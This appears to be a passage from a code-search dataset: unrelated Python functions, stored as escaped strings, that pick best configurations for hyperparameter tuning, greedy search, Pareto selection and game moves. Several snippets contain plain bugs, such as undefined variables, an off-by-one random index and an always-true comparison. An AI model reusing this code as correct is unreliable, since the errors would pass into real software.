MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best[0], overall_run_best[1][\"training\"], overall_run_best[1][\"hp_selection\"], overall_run_best[1][\"validation\"])\n\n # Overall best will contain as first argument the technique with the best (across runs) average (across folds) mape on validation; now we consider on all the runs and on all the folds the configuraiton of this technique with best validation mape\n\n elif (validation, hp_selection) in {(\"All\", \"KFold\"), (\"HoldOut\", \"KFold\"), (\"Extrapolation\", \"KFold\")}:\n folds = float(self._campaign_configuration['General']['folds'])\n # For each run, for each technique, for each configuration, the aggregated mape\n run_tec_conf_set = recursivedict()\n\n # Hyperparameter search aggregating over folders\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n fold = int(conf.get_signature()[2].replace(\"f\", \"\"))\n technique = conf.technique\n configuration = str(conf.get_signature()[4:])\n if \"hp_selection\" not in run_tec_conf_set[run][technique][configuration]:\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = 0\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = run_tec_conf_set[run][technique][configuration][set_name] + conf.mapes[set_name] / folds\n\n # 
Select the best configuration for each technique across different folders\n run_tec_best_conf = recursivedict()\n for run in run_tec_conf_set:\n for tec in run_tec_conf_set[run]:\n for conf in run_tec_conf_set[run][tec]:\n if tec not in run_tec_best_conf[run] or run_tec_conf_set[run][tec][conf][\"hp_selection\"] < run_tec_best_conf[run][tec][1][\"hp_selection\"]:\n run_tec_best_conf[run][tec] = (conf, run_tec_conf_set[run][tec][conf])\n\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"Printing results for run %s\", run)\n overall_run_best = () # (technique, configuration, mapes)\n # Print data of single techniques\n for technique in run_tec_best_conf[run]:\n temp = run_tec_best_conf[run][technique]\n self._logger.info(\"---Best result for %s - Configuration is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, temp[0], temp[1][\"training\"], temp[1][\"hp_selection\"], temp[1][\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or temp[1][\"hp_selection\"] < overall_run_best[2][\"hp_selection\"]:\n overall_run_best = (technique, temp[0], temp[1])\n\n self._logger.info(\"---Overall best result is %s %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best[0], overall_run_best[1], overall_run_best[2][\"training\"], overall_run_best[2][\"hp_selection\"], overall_run_best[2][\"validation\"])\n\n elif (validation, hp_selection) in {(\"KFold\", \"KFold\")}:\n folds = float(self._campaign_configuration['General']['folds'])\n # For each run, for each external fold, for each technique, the aggregated mape\n run_efold_tec_conf_set = recursivedict()\n\n # Hyperparameter search aggregating over internal folders\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n ext_fold = int(conf.get_signature()[2].replace(\"f\", \"\"))\n technique = conf.technique\n configuration = str(conf.get_signature()[4:])\n if \"hp_selection\" not in run_tec_conf_set[run][technique][configuration]:\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = 0\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = run_tec_conf_set[run][technique][configuration][set_name] + (conf.mapes[set_name] / (folds * folds))\n if configuration not in run_efold_tec_conf_set[run][ext_fold][technique]:\n for set_name in set_names:\n run_efold_tec_conf_set[run][ext_fold][technique][configuration][set_name] = 0\n for set_name in set_names:\n run_efold_tec_conf_set[run][ext_fold][technique][configuration][set_name] = run_efold_tec_conf_set[run][ext_fold][technique][configuration][set_name] + (conf.mapes[set_name] / (folds * folds))\n\n # Select the best configuration for each technique in each external fold across different internal folders\n run_efold_tec_best_conf = recursivedict()\n for run in run_efold_tec_conf_set:\n for efold in run_efold_tec_conf_set[run]:\n for tec in run_efold_tec_conf_set[run][efold]:\n for conf in run_efold_tec_conf_set[run][efold][tec]:\n if conf not in run_efold_tec_best_conf[run][efold][tec] or run_efold_tec_conf_set[run][efold][tec][conf][\"hp_selection\"] < run_efold_tec_best_conf[run][efold][tec][1][\"hp_selection\"]:\n run_efold_tec_best_conf[run][efold][tec] = (conf, run_efold_tec_conf_set[run][efold][tec][conf], run_efold_tec_conf_set[run][efold][tec][conf])\n\n # Aggregate on external folds\n run_tec_set = 
recursivedict()\n for run in run_efold_tec_best_conf:\n for efold in run_efold_tec_best_conf[run]:\n for tec in run_efold_tec_best_conf[run][efold]:\n if \"hp_selection\" not in run_tec_set[run][tec]:\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = 0\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = run_tec_set[run][tec][set_name] + run_efold_tec_best_conf[run][efold][tec][1][set_name]\n\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"Printing results for run %s\", run)\n overall_run_best = ()\n # Print data of single techniques\n for technique in run_tec_set[run]:\n self._logger.info(\"---Best result for %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, run_tec_set[run][technique][\"training\"], run_tec_set[run][technique][\"hp_selection\"], run_tec_set[run][technique][\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or run_tec_set[run][technique][\"hp_selection\"] < overall_run_best[1][\"hp_selection\"]:\n overall_run_best = (technique, run_tec_set[run][technique])\n\n self._logger.info(\"---Overall best result is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best[0], overall_run_best[1][\"training\"], overall_run_best[1][\"hp_selection\"], overall_run_best[1][\"validation\"])\n\n else:\n self._logger.error(\"Unexpected combination: %s\", str((validation, hp_selection)))\n sys.exit(1)\n best_confs = {}\n best_technique = None\n for conf in self._exp_confs:\n technique = conf.technique\n if technique not in best_confs or conf.mapes[\"validation\"] < best_confs[technique].mapes[\"validation\"]:\n best_confs[technique] = conf\n for technique in best_confs:\n if not best_technique or best_confs[technique].mapes[\"validation\"] < best_confs[best_technique].mapes[\"validation\"]:\n best_technique = technique\n if bool(self._campaign_configuration['General']['details']):\n for run in run_tec_conf_set:\n for tec in run_tec_conf_set[run]:\n for conf in run_tec_conf_set[run][tec]:\n assert \"hp_selection\" in run_tec_conf_set[run][tec][conf]\n assert \"validation\" in run_tec_conf_set[run][tec][conf], \"training MAPE not found for \" + str(run) + str(tec) + str(conf)\n self._logger.info(\"Run %s - Technique %s - Conf %s - Training MAPE %f - Test MAPE %f\", str(run), ec.enum_to_configuration_label[tec], str(conf), run_tec_conf_set[run][tec][conf][\"hp_selection\"], run_tec_conf_set[run][tec][conf][\"validation\"])\n return best_confs, best_technique", "def pick_first_connection(self):\n self.best_connection = []\n stations = list(self.grid.stations.values())\n\n # add a first station to the track \n for station in stations:\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, station.name)\n\n lookahead_1 = station.connections\n\n # calculate quality of all connections and save the best connection\n for la1 in lookahead_1: \n next_station = stations[int(la1)].name\n self.track.add_station(self.grid, next_station)\n lookahead_2 = stations[int(la1)].get_connections()\n \n for la2 in lookahead_2:\n # if adding the connection exceeds the track's max time length \n if self.track.add_station(self.grid, la2[0].name) is False:\n break\n \n quality = self.grid.get_quality()\n self.track.remove_last_station()\n\n # checks if the quality of the track is the best one yet and remembers it\n if quality > self.best_score:\n 
self.best_score = quality \n self.best_connection = [station.name, stations[int(la1)].name, la2[0].name]\n self.track.remove_last_station()\n \n # if adding another track does not lead to a better quality, stop algorithm\n if self.best_connection == []:\n return False\n \n # add best connection to the track\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, self.best_connection[0])\n\n self.count += 1\n\n return station", "def best_config(self):\n if self.total_propose == 0:\n idx = random.randint(0, len(self.config_list))\n result = {'config_id': idx,\n 'score': -1 * float('inf'),\n 'configs': self.config_list[idx]}\n return [result]\n else:\n pareto_board = self.sieve_board.copy()\n pareto_board = pareto_board.dropna()\n nondominated = pareto.eps_sort([list(pareto_board.itertuples(False))],\n objectives=self.pareto_cols,\n epsilons=None,\n maximize=self.max_object_ids)\n pareto_list = []\n for tmp_list in nondominated:\n result = {}\n for i, value in enumerate(tmp_list):\n if i == 1:\n result['config_id'] = value\n result['configs'] = self.config_list[int(value)]\n elif i >= 3:\n result[self.sieve_columns[i]] = value\n pareto_list.append(result)\n return pareto_list", "def get_best_model_configs(self):\n self.best_models = {}\n with self.database:\n cur = self.database.cursor()\n for model in self.active_models:\n if self.tuning_depth == 'minimal':\n a = cur.execute(\"SELECT MAX(accuracy),unique_id from model_performance_results\")\n elif self.tuning_depth == 'normal':\n a = cur.execute(\"SELECT MAX(accuracy),unique_id from model_performance_results WHERE model = ?\",\n (model,))\n elif self.tuning_depth == 'maximal':\n a = cur.execute(\"SELECT MAX(accuracy),unique_id from model_performance_results WHERE model = ?\",\n (model,))\n # TODO not implimented, same as normal\n self.best_models[model] = list(a)[0][0]", "def get_optimum_config(\n self, tested_configs, fold_operation=FoldOperations.MEAN\n ):\n\n list_of_config_vals = []\n list_of_non_failed_configs = [\n conf for conf in tested_configs if not conf.config_failed\n ]\n\n if len(list_of_non_failed_configs) == 0:\n raise Warning(\"No Configs found which did not fail.\")\n try:\n\n if len(list_of_non_failed_configs) == 1:\n best_config_outer_fold = list_of_non_failed_configs[0]\n else:\n for config in list_of_non_failed_configs:\n list_of_config_vals.append(\n MDBHelper.get_metric(\n config,\n fold_operation,\n self.best_config_metric,\n train=False,\n )\n )\n\n if self.maximize_metric:\n # max metric\n best_config_metric_nr = np.argmax(list_of_config_vals)\n else:\n # min metric\n best_config_metric_nr = np.argmin(list_of_config_vals)\n\n best_config_outer_fold = list_of_non_failed_configs[\n best_config_metric_nr\n ]\n\n # inform user\n logger.debug(\n \"Optimizer metric: \"\n + self.best_config_metric\n + \"\\n\"\n + \" --> Maximize metric: \"\n + str(self.maximize_metric)\n )\n\n logger.info(\n \"Number of tested configurations: \" + str(len(tested_configs))\n )\n logger.photon_system_log(\n \"---------------------------------------------------------------------------------------------------------------\"\n )\n logger.photon_system_log(\"BEST_CONFIG \")\n logger.photon_system_log(\n \"---------------------------------------------------------------------------------------------------------------\"\n )\n logger.photon_system_log(\n json.dumps(\n best_config_outer_fold.human_readable_config,\n indent=4,\n sort_keys=True,\n )\n )\n\n return best_config_outer_fold\n except BaseException 
as e:\n logger.error(str(e))", "def run_algorithm(self):\n print(f\"Checking all possible configurations with {self.algorithm}...\")\n\n if self.algorithm == \"test\" or (self.algorithm == \"greedy\" and\n self.iterations == 1000):\n\n # Test each configuration found with greedy (1000 iterations)\n while True:\n try:\n self.index += 1\n self.batteries = self.load_batteries(self.index)\n\n # Break if all configurations are checked\n except FileNotFoundError:\n break\n self.calculate_cable()\n self.link_houses()\n greedy(self, 1000)\n\n # Load best solution if user wanted to run greedy\n if self.algorithm == \"greedy\":\n self.load()\n self.plot_houses()\n\n # Call correct algorithm\n else:\n self.load()\n if self.algorithm == \"stepdown\":\n stepdown(self)\n elif self.algorithm == \"greedy\":\n greedy(self, self.iterations)\n elif self.algorithm == \"hill\":\n hill_climber(self, self.iterations)\n elif self.algorithm == \"dfs\":\n dfs(self)\n elif self.algorithm == \"random\":\n random_algorithm(self, self.iterations)\n elif self.algorithm == \"bnb\":\n bnb(self)\n\n self.load()\n self.plot_houses()", "def save_final_config(self, finalCfg):\n if True:\n cfgDict = self.bestcfg\n else:\n cfgDict = finalCfg.data\n print 'best score was %d, discrepancies follow:' % self.best\n for p in sorted(cfgDict.keys()):\n if cfgDict[p] != self.goals[p]:\n print '(%s, weight %d) ' % (p, self.weight[p]),", "def next_tune_cfg(self):\n # generate tuning space according to user chosen tuning strategy\n\n while True:\n op_cfgs = {}\n op_cfgs['calib_iteration'] = int(np.random.choice(self.calib_iter))\n op_cfgs['op'] = {}\n for op, configs in self.opwise_quant_cfgs.items():\n cfgs_len = len(configs)\n if cfgs_len > 0:\n op_cfgs['op'][op] = configs[np.random.choice(cfgs_len)]\n else:\n op_cfgs['op'][op] = self.opwise_tune_cfgs[op][np.random.choice(\n len(self.opwise_tune_cfgs[op]))]\n\n yield op_cfgs", "def update_global_best(self, offsprings):\n\n # the fitness of the particles are calculated by their crowding distance\n crowding_distance(swarm)\n\n # the length of the leaders archive cannot be longer than the number of the initial population\n self.leaders += swarm\n self.leaders.truncate(self.options['max_population_size'], 'crowding_distance')\n # self.problem.archive += swarm\n\n return", "def update_global_best(self, swarm):\n\n # the fitness of the particles are calculated by their crowding distance\n crowding_distance(swarm)\n\n # the length of the leaders archive cannot be longer than the number of the initial population\n self.leaders += swarm\n self.leaders.truncate(self.options['max_population_size'], 'crowding_distance')\n # self.problem.archive += swarm\n\n return", "def save_final_config(self, configuration):\n optimal_cfg = ''\n for cfg in configuration.data.keys():\n if configuration.data[cfg] == \"on\":\n optimal_cfg += cfg\n optimal_cfg += ' '\n log.info(\n \"Optimal pass sequence seen so far: [{0}]\".format(optimal_cfg))", "def _get_best_configs(\n self,\n configs: list[Configuration],\n bracket: int,\n stage: int,\n from_keys: list[InstanceSeedBudgetKey],\n ) -> list[Configuration]:\n try:\n n_configs = self._n_configs_in_stage[bracket][stage + 1]\n except IndexError:\n return []\n\n rh = self.runhistory\n configs = configs.copy()\n\n for config in configs:\n isb_keys = rh.get_instance_seed_budget_keys(config)\n if not all(isb_key in isb_keys for isb_key in from_keys):\n raise NotEvaluatedError\n\n selected_configs: list[Configuration] = []\n while len(selected_configs) < n_configs:\n # We 
calculate the pareto front for the given configs\n # We use the same isb keys for all the configs\n all_keys = [from_keys for _ in configs]\n incumbents = calculate_pareto_front(rh, configs, all_keys)\n\n # Idea: We recursively calculate the pareto front in every iteration\n for incumbent in incumbents:\n configs.remove(incumbent)\n selected_configs.append(incumbent)\n\n # If we have more selected configs, we remove the ones with the smallest crowding distance\n if len(selected_configs) > n_configs:\n all_keys = [from_keys for _ in selected_configs]\n selected_configs = sort_by_crowding_distance(rh, selected_configs, all_keys)[:n_configs]\n logger.debug(\"Found more configs than required. Removed configs with smallest crowding distance.\")\n\n return selected_configs", "def get_config(self, **kwargs) -> dict:\n if self._first_is_default and (not self._results):\n # Try default config first\n new_config = self._params_default\n else:\n new_config = self._sample_config()\n num_tries = 1\n while self._pickle_config(new_config) in self._results:\n if num_tries > self.MAX_RETRIES:\n if self._num_configs is not None:\n num_results = len(self._results)\n logger.log(30, f\"Stopping HPO due to exhausted search space: {num_results} of {self._num_configs} possible configs ran.\")\n raise ExhaustedSearchSpaceError\n assert num_tries <= self.MAX_RETRIES, f\"Cannot find new config in LocalRandomSearcher, even after {self.MAX_RETRIES} trials\"\n new_config = self._sample_config()\n num_tries += 1\n self._add_result(new_config, self._reward_while_pending())\n return new_config", "def update_global_best(self, swarm):\n\n # the fitness of the particles are calculated by their crowding distance\n crowding_distance(swarm)\n\n # the length of the leaders archive cannot be longer than the number of the initial population\n self.leaders += swarm\n self.leaders.truncate(self.options['max_population_size'], 'crowding_distance')\n self.archive += swarm\n\n return", "def search_station(st):\n\n res = []\n for key, val in _STATIONS.items():\n score = fuzz.token_set_ratio(st, key)\n res.append(\n {\n 'station': key,\n 'score': score,\n 'station_id': val\n }\n )\n if not res:\n return {}\n else:\n res = sorted(res, key=lambda k: k['score'], reverse=True)\n res = res[0]\n return res", "def _generate_best_stats(self):\n self._best_trip = self._trips_dict[self._primary_mode]\n self._duration = self._best_trip.get_duration()\n self._distance = self._best_trip.get_distance()\n self._price_range = self._best_trip.get_price_range()\n self.set_start_loc_from_dict(self._best_trip.get_start_location())\n self.set_end_loc_from_dict(self._best_trip.get_end_location())\n self._build_legs()\n self._build_directions()", "def best_last_option(self):\n \n # get essential values\n board = self.get_game_space()\n affinity = self.get_affinity()\n \n # pick the right check for the game we are playing\n if isinstance(board, Gomoku):\n \n # get all possible blocks to make a move in\n winning_blocks = board.get_winning_blocks(affinity)\n print('total winning blocks:'+str(len(winning_blocks)))\n best_blocks = []\n best_block = None\n\n # find the largest blocks to place a stone in\n for block in winning_blocks:\n if affinity == BLUE_TILE():\n if len(best_blocks) == 0: best_blocks.append(block)\n elif len(block.blue) > len(best_blocks[0].blue):\n best_blocks = []\n best_blocks.append(block)\n elif len(block.blue) == len(best_blocks[0].blue):\n best_blocks.append(block)\n elif affinity ==RED_TILE():\n if len(best_blocks) == 0: 
best_blocks.append(block)\n if len(block.red) > len(best_blocks[0].red):\n best_blocks = []\n best_blocks.append(block)\n elif len(block.red) == len(best_blocks[0].red):\n best_blocks.append(block)\n\n # find the best block to place a stone in\n for block in best_blocks:\n if best_block is None: best_block = block \n elif block.tiles[0][0] <= best_block.tiles[0][0]: \n if (block.tiles[0][1] != block.tiles[1][1]):\n if block.direction == 'vertical':\n if block.tiles[WINNING_ROW_SIZE()-1][1] >= best_block.tiles[WINNING_ROW_SIZE()-1][1]:\n if affinity == RED_TILE(): \n if len(block.red) >= len(best_block.red):\n print('considered block:'+str(block.tiles))\n best_block = block \n if affinity == BLUE_TILE(): \n if len(block.blue) >= len(best_block.blue):\n print('considered block:'+str(block.tiles))\n best_block = block\n else:\n if block.tiles[0][1] >= best_block.tiles[0][1]:\n if affinity == RED_TILE(): \n if len(block.red) >= len(best_block.red):\n print('considered block:'+str(block.tiles))\n best_block = block \n if affinity == BLUE_TILE(): \n if len(block.blue) >= len(best_block.blue):\n print('considered block:'+str(block.tiles))\n best_block = block \n else:\n if block.tiles[0][1] >= best_block.tiles[0][1] and block.tiles[1][0] <= best_block.tiles[1][0]:\n if affinity == RED_TILE(): \n if len(block.red) >= len(best_block.red):\n print('considered block:'+str(block.tiles))\n best_block = block \n if affinity == BLUE_TILE(): \n if len(block.blue) >= len(best_block.blue):\n print('considered block:'+str(block.tiles))\n best_block = block \n\n # find the best move to make out of the best block \n # print('best block:'+str(best_block.tiles))\n best_move = (7,-1)\n for tile_i in range(len(best_block.tiles)):\n tile = best_block.tiles[tile_i]\n next_tile = None\n prev_tile = None \n if tile_i+1 in range(len(best_block.tiles)):\n next_tile = best_block.tiles[tile_i+1]\n if tile_i-1 in range(len(best_block.tiles)):\n prev_tile = best_block.tiles[tile_i-1]\n if board.get_tile(tile[0],tile[1]) == BLANK_TILE():\n if prev_tile is not None and next_tile is None:\n if board.get_tile(prev_tile[0],prev_tile[1]) == affinity:\n if tile[0] <= best_move[0]: \n if tile[1] >= tile[1]:\n best_move = tile \n elif next_tile is not None and prev_tile is None:\n if board.get_tile(next_tile[0],next_tile[1]) == affinity:\n if tile[0] <= best_move[0]: \n if tile[1] >= tile[1]:\n best_move = tile \n elif next_tile is not None and prev_tile is not None:\n if board.get_tile(prev_tile[0],prev_tile[1]) == affinity or \\\n board.get_tile(next_tile[0],next_tile[1]) == affinity:\n if tile[0] <= best_move[0]: \n if tile[1] >= tile[1]:\n best_move = tile \n \n return best_move", "def Alternating_Minimization(self):\n Losses = {'Total':[]}\n self._compute_loss_seperately()\n\n Losses['Total'].append(self.total_loss)\n\n for it in range(self.max_its):\n print('iteration {} starts'.format(it+1))\n\n print('Local Updates:')\n for k in range(self.K):\n self._update_L(k)\n self._update_local_X(k)\n self._update_local_W(k)\n\n print('Global Updates:')\n self._update_G()\n self._update_global_X()\n self._update_global_W()\n\n print('Compute Losses')\n self._compute_loss_seperately()\n self._imputation_error()\n self._forecasting_error()\n\n Losses['Total'].append(self.total_loss)\n\n print('iteration {} complete: SSE: {}, Total loss: {}, Imputation NRMSE: {}, Imputation ND: {}, Forecasting NRMSE {}, Forecasting ND {}'.format(it+1, self.SSE, self.total_loss, self.imputation_NRMSE, self.imputation_ND, self.forecasting_NRMSE, 
self.forecasting_ND))\n print('Best results so far is {}'.format(self.best_results))\n\n if Losses['Total'][-1] > Losses['Total'][-2]:\n print(\"Error: total loss increases and it is impossible\")\n break", "def get_next_config(self):\n\n self.reset_trial()\n self._cur_config = self.get_default()\n return self._cur_config if len(self._results) == 0 else None", "def _choose_best_trip(self):\n times = [(key, self._trips_dict[key].get_duration()) for key in self._trips_dict.keys()\n if self._trips_dict[key] is not None]\n self._primary_mode = min(times, key=lambda tup: tup[1])[0]", "def set_optimal_parameters(self):\n # Getting the best trial based on the test errors\n idx = self.trial_losses.index(min(self.trial_losses))\n self.best_trial = self.trial_list[idx]\n self.objective.parse_trial(self.best_trial)", "def test_get_all_configurations(self):\n\n time_series = ['test-all-conf-1', 'test-all-conf-2', 'test-all-conf-3']\n [timeserie_configuration.get_timeserie_configure(self.get_local_dynamo_cli(),\n ts) for ts in time_series]\n\n all_configurations = timeserie_configuration.get_all_configurations(\n self.get_local_dynamo_cli())\n self.assertEquals(3, len(all_configurations))\n self.assertTrue(all([conf.default for conf in all_configurations]))", "def greedy(self, iterations):\n # turn houses into list\n random_houses = list(self.houses.values())\n\n iterations = int(iterations)\n\n prices = []\n count = 0\n misses = -iterations\n\n # Do untill we have <iterations> succesfull configurations\n while count < iterations:\n self.disconnect()\n # While one or more batteries are over their capacity or not every\n # house is linked to a battery\n while self.check_linked() is False or self.check_full() is True:\n misses += 1\n\n # shuffle order of houses\n random.shuffle(random_houses)\n\n # remove connections, if any\n self.disconnect()\n\n # for every house find closest battery to connect to provided\n # that this house wont over-cap the battery\n for house in random_houses:\n for i in range(len(self.batteries.values())):\n output = house.output\n curr = self.batteries[list(house.diffs)[i]].filled()\n cap = self.batteries[list(house.diffs)[i]].capacity\n if output + curr <= cap:\n batt = self.batteries[list(house.diffs)[i]]\n house.link = batt\n batt.linked_houses.append(house)\n break\n\n # calculate price\n for battery in self.batteries.values():\n if not battery.linked_houses:\n del battery\n price = self.calculate_cost()\n prices.append(price)\n\n count += 1\n\n if min(prices) < self.lowest:\n self.lowest = min(prices)\n with open(f\"weighted_clusters_WIJK{self.input}.dat\",\n \"wb\") as f:\n pickle.dump([self.houses, self.batteries], f)\n\n # self.plot_houses()\n return min(prices)", "def find_best_free_param_configuration_LOO_adj_sen(p):\n\n measures_res = linux_base_path+ \"/measures_res\"+setup+\"/\"\n# measures_res = base_path +\"\\\\measures_res\"+setup+\"\\\\\"\n# nDCG_MAP_res = base_path +\"\\\\nDCG_MAP_res\\\\\"\n claim_dict = read_pickle(\"claim_dict\")\n claim_num_list = [4,7,17,21,36,37,39,40,41,42,45,46,47,50,51,53,54,55,57,58,59,60,61,62,66,69,70,79,80]\n# claim_num_list = [4,47,53,58,7,54]\n best_configuration_for_nDCG_AP_prec_at_k_left_out_res = {} #key is left out claim and and value is the alpha,beta,lambda configuration that led to best measures - avg nDCG and AP across the train claims\n measures_res_of_left_out_in_its_best_conf = {} #key - left out claim num, and value is the measures of it, in the best configuration without it.\n \n k_val = 50\n prec_at_k_train = 
rcdtype.recordtype('prec_at_k_train', 'at_5 at_10')\n max_prec_at_k = rcdtype.recordtype('max_prec_at_k', 'max_val max_conf')\n try:\n for left_out_claim_indx in range(len(claim_num_list)):\n max_nDCG = 0\n max_MAP = 0\n max_nDCG_conf = []\n max_MAP_conf = []\n max_prec_at_5 = max_prec_at_k(0,\"\")\n max_prec_at_10 = max_prec_at_k(0,\"\")\n \n left_out_claim_num = claim_num_list[left_out_claim_indx]\n temp_claim_num_list = claim_num_list[:]\n temp_claim_num_list.remove(left_out_claim_num)\n for alpha in range(0,7,1): #change just for test!\n for beta in range(0,10,1):\n for lambda_int in range(0,11,1):\n for delta_1 in range(0,10,1):\n for delta_2 in range(0,10,1):\n if not delta_1+delta_2 >9: \n lambda_f = turn_to_float([lambda_int])\n (alpha_f,beta_f,delta_1_f,delta_2_f) = turn_to_float([alpha,beta,delta_1,delta_2])\n measures_all_claims = utils_linux.read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_delta1_\"+str(delta_1_f)+\"_delta2_\"+str(delta_2_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f))\n \n # AP_all_claims_curr_param_values = read_pickle(nDCG_MAP_res+\"AP_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f))\n # nDCG_all_claims_curr_param_values = read_pickle(nDCG_MAP_res+\"NDCG_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f)+\"_at_\"+str(p))\n # prec_at_k_all_claims_params_values = read_pickle(nDCG_MAP_res+\"prec_at_k_all_claims_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f))\n avg_nDCG_on_train = 0\n MAP_on_train = 0\n p_at_k_train_avg = prec_at_k_train(0,0)\n for clm_num_train in temp_claim_num_list:\n avg_nDCG_on_train += measures_all_claims[str(clm_num_train)][0]\n MAP_on_train += measures_all_claims[str(clm_num_train)][1] #in this config' -> get the measures\n p_at_k_train_avg.at_5 += measures_all_claims[str(clm_num_train)][2]\n p_at_k_train_avg.at_10 += measures_all_claims[str(clm_num_train)][3]\n avg_nDCG_on_train = float(float(avg_nDCG_on_train)/float(len(temp_claim_num_list)))\n MAP_on_train = float(float(MAP_on_train)/float(len(temp_claim_num_list)))\n p_at_k_train_avg.at_5 = float(float(p_at_k_train_avg.at_5)/float(len(temp_claim_num_list)))\n p_at_k_train_avg.at_10 = float(float(p_at_k_train_avg.at_10)/float(len(temp_claim_num_list)))\n \n if avg_nDCG_on_train > max_nDCG:\n max_nDCG = avg_nDCG_on_train\n max_nDCG_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n if MAP_on_train > max_MAP:\n max_MAP = MAP_on_train\n max_MAP_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n if p_at_k_train_avg.at_5 > max_prec_at_5.max_val:\n max_prec_at_5.max_val = p_at_k_train_avg.at_5\n max_prec_at_5.max_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n if p_at_k_train_avg.at_10 > max_prec_at_10.max_val:\n max_prec_at_10.max_val = p_at_k_train_avg.at_10\n max_prec_at_10.max_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n best_configuration_for_nDCG_AP_prec_at_k_left_out_res[left_out_claim_num] = [(max_nDCG,max_nDCG_conf),(max_MAP,max_MAP_conf),(max_prec_at_5.max_val,max_prec_at_5.max_conf),(max_prec_at_10.max_val,max_prec_at_10.max_conf)]\n #finished leaving out,\n #now calculate the nDCG and MAP of the left out claims with its best configuration results\n avg_nDCG_on_left_out = 0\n MAP_on_left_out = 0\n avg_prec_at_5_on_left_out = 0\n avg_prec_at_10_on_left_out = 0\n for clm_num in claim_num_list:\n 
(best_alpha_nDCG,best_beta_nDCG,best_lambda_nDCG,best_delta1_nDCG,best_delta2_nDCG) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1]\n (best_alpha_MAP,best_beta_MAP,best_lambda_MAP,best_delta1_MAP,best_delta2_MAP) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1]\n (best_alpha_prec_at_5,best_beta_prec_at_5,best_lambda_prec_at_5,best_delta1_prec_at_5,best_delta2_prec_at_5) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1]\n (best_alpha_prec_at_10,best_beta_prec_at_10,best_lambda_prec_at_10,best_delta1_prec_at_10,best_delta2_prec_at_10) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1]\n #read the best config' dict\n best_config_of_nDCG_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_nDCG)+\"_beta_\"+str(best_beta_nDCG)+\"_delta1_\"+str(best_delta1_nDCG)+\"_delta2_\"+str(best_delta2_nDCG)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_nDCG))\n best_config_of_AP_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_MAP)+\"_beta_\"+str(best_beta_MAP)+\"_delta1_\"+str(best_delta1_MAP)+\"_delta2_\"+str(best_delta2_MAP)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_MAP))\n best_config_of_prec_at_5_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_prec_at_5)+\"_beta_\"+str(best_beta_prec_at_5)+\"_delta1_\"+str(best_delta1_prec_at_5)+\"_delta2_\"+str(best_delta2_prec_at_5)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_prec_at_5)) #take only the first item in the tuple\n best_config_prec_of_at_10_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_prec_at_10)+\"_beta_\"+str(best_beta_prec_at_10)+\"_delta1_\"+str(best_delta1_prec_at_10)+\"_delta2_\"+str(best_delta2_prec_at_10)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_prec_at_10)) #take only the second item in the tuple\n measures_res_of_left_out_in_its_best_conf[clm_num] = (best_config_of_nDCG_dict[str(clm_num)][0],best_config_of_AP_dict[str(clm_num)][1],best_config_of_prec_at_5_dict[str(clm_num)][2],best_config_prec_of_at_10_dict[str(clm_num)][3])\n avg_nDCG_on_left_out += best_config_of_nDCG_dict[str(clm_num)][0]\n MAP_on_left_out += best_config_of_AP_dict[str(clm_num)][1]\n avg_prec_at_5_on_left_out += best_config_of_prec_at_5_dict[str(clm_num)][2]\n avg_prec_at_10_on_left_out += best_config_prec_of_at_10_dict[str(clm_num)][3]\n \n save_pickle(measures_res+\"measures_res_of_left_out_in_its_best_conf_k_top_docs_\"+str(k_val)+\"_at_\"+str(p), measures_res_of_left_out_in_its_best_conf)\n #report the avg\n avg_nDCG_on_left_out = float(float(avg_nDCG_on_left_out)/float(len(claim_num_list))) \n MAP_on_left_out = 